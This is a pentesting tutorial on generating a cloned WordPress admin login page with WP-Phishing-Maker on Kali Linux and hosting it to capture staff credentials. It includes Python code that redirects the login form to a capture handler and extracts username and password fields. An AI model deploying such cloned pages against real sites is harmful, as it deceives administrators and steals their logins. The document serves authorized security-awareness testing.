Kali Linux WordPress Admin Phishing Pages
Phishing attacks are a social engineering method that relies solely on human error and trickery rather than on a technical vulnerability in the target.
Let's assume we are doing a pentest on a popular WordPress website with the admin's permission. The goal is to phish information from staff members without breaking into their WordPress installation or pulling data from its SQL databases. The site admin has spent thousands of dollars maintaining the security of his website and believes it to be quite safe, although he cannot be sure that his staff will not compromise it through human error.
A lot of people conclude that a user must be stupid to fall for a phishing page. This is not the case: with thousands of emails per day arriving in business and personal inboxes it is quite easy to fall into the trap, especially in shared inboxes where multiple staff read and respond to messages. Phishing pages can look identical to the real thing and be very believable. We do not blame the targets, as most have not had sufficient training. The admin's idea for the pentest is not to make staff feel stupid for falling for the phishing pages but to educate them in order to prevent further attacks in the future.
We could use SEToolkit to clone the login page of the WordPress site, but that is inconvenient when a listener has to run for long periods of time. Using the PHP output from the WP-Phishing-Maker script, captured data can instead be stored in plain text, a MySQL database, etc. This phishing method requires a web server to host the files generated by the script.
Requirements: a Linux based operating system (Kali Linux here) and a web server to host the generated files.
First of all, download WP-Phishing-Maker from the following download location.
First we need to navigate to the script directory using the cd command (change directory).
Then we need to make the WP-Phishing-Maker bash script executable, which we can do with the chmod command:
chmod +x WP-Phishin-Master
The bash script is now ready to run from the same directory.
Once WP-Phishing-Maker has loaded, choose option 1 (Start).
The script will then prompt for an output location. This can be any directory in which you want to save the WordPress phishing page generated by WP-Phishing-Maker; I will create a new directory inside root.
Open a new terminal and create an empty directory using the mkdir command.
The script will now prompt for the WordPress website to clone as a phishing page.
Choose whether the target uses HTTP or HTTPS and press Enter. When the script has finished generating the WordPress phishing page you will see a message telling you that the pages are complete and ready to use.
We can now upload the PHP files generated by WP-Phishing-Maker to a web host.
For this example we cloned a WordPress website that we own for testing purposes, Iphonegiveaway.co.uk. The idea of this type of phishing attack is to trick the website admin into logging into a fake WordPress admin panel.
We uploaded the PHP files from the bash script's output directory to a shared web host.
Demo (Don’t enter any personal information into this page.)
Submitted credentials are written in plain text to a file in the upload directory, which you can retrieve from your FTP directory. Note that this file is itself sensitive: on a shared host anyone who can reach that directory can read it, so restrict access to it and delete it once the engagement is over.
This tutorial is for educational purposes only; attack only websites you own or have permission to pentest.
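To make the two steps above concrete (cloning the login page and harvesting what is posted to it), here is an added Python example that models what a WordPress login-page cloner produces. It is not WP-Phishing-Maker's code; the wp-login.php fragment is constructed, and the site example.org and the capture path /capture.php are assumed names. The cloner rewrites the form action so the browser posts to the attacker's handler, and makes root-relative asset links absolute so the copy still renders like the original when hosted elsewhere; the handler parses the standard WordPress field names (log, pwd, redirect_to), which the generated PHP then writes out in plain text before redirecting to the real site.

```python
"""Model of a WordPress login-page clone and its capture handler.

Added example, not WP-Phishing-Maker's code. The page fragment below is
constructed; example.org and /capture.php are assumed names.
"""
import re
from urllib.parse import parse_qs, urljoin

# Constructed fragment of a wp-login.php page (not fetched from any site).
SAMPLE_WP_LOGIN = """<html><head>
<link rel="stylesheet" href="/wp-admin/css/login.min.css">
</head><body>
<form name="loginform" id="loginform" action="https://example.org/wp-login.php" method="post">
<input type="text" name="log" id="user_login">
<input type="password" name="pwd" id="user_pass">
<input type="hidden" name="redirect_to" value="https://example.org/wp-admin/">
<input type="submit" name="wp-submit" value="Log In">
</form>
<img src="/wp-content/uploads/logo.png">
</body></html>"""


def clone_login_page(html, target_base, capture_path):
    """Return a copy of the login page that posts to capture_path and
    loads its assets from the original site by absolute URL."""
    # Point every <form action="..."> at the capture handler.
    html = re.sub(r'(<form\b[^>]*\baction=")[^"]*(")',
                  lambda m: m.group(1) + capture_path + m.group(2), html)
    # Root-relative href/src references would 404 on the hosting server;
    # rewrite them as absolute URLs so the clone looks identical.
    html = re.sub(r'((?:href|src)=")(/[^"]*)(")',
                  lambda m: m.group(1) + urljoin(target_base, m.group(2)) + m.group(3),
                  html)
    return html


def parse_login_post(body):
    """Extract the WordPress login fields from a urlencoded POST body.

    This is what the generated capture script sees; it then appends the
    values to a plain text file and redirects to redirect_to.
    """
    fields = parse_qs(body, keep_blank_values=True)
    return {
        "username": fields.get("log", [""])[0],
        "password": fields.get("pwd", [""])[0],
        "redirect_to": fields.get("redirect_to", [""])[0],
    }


if __name__ == "__main__":
    print(clone_login_page(SAMPLE_WP_LOGIN, "https://example.org", "/capture.php"))
    print(parse_login_post("log=admin&pwd=Pa%24%24w0rd&redirect_to=https%3A%2F%2Fexample.org%2Fwp-admin%2F&wp-submit=Log+In"))
```

Because the clone only changes the form action and asset URLs, the page is byte-for-byte the real one otherwise, which is why a trained eye should check the address bar rather than the page's appearance.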
Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details (and, indirectly, money), often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. The word is a neologism created as a homophone of fishing, due to the similarity of using bait in an attempt to catch a victim. According to the 2013 Microsoft Computing Safety Index, released in February 2014, the annual worldwide impact of phishing could be as high as US$5 billion.
Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter personal information at a fake website whose look and feel are almost identical to the legitimate one. Communications purporting to be from social web sites, auction sites, banks, online payment processors or IT administrators are often used to lure victims. Phishing emails may contain links to websites that are infected with malware.
WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress is installed on a web server that is either part of an Internet hosting service or a network host in its own right. The first case may be a service like WordPress.com, for example, and the second case could be a computer running the software package from WordPress.org. A local computer may be used for single-user testing and learning purposes. Features include a plugin architecture and a template system. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.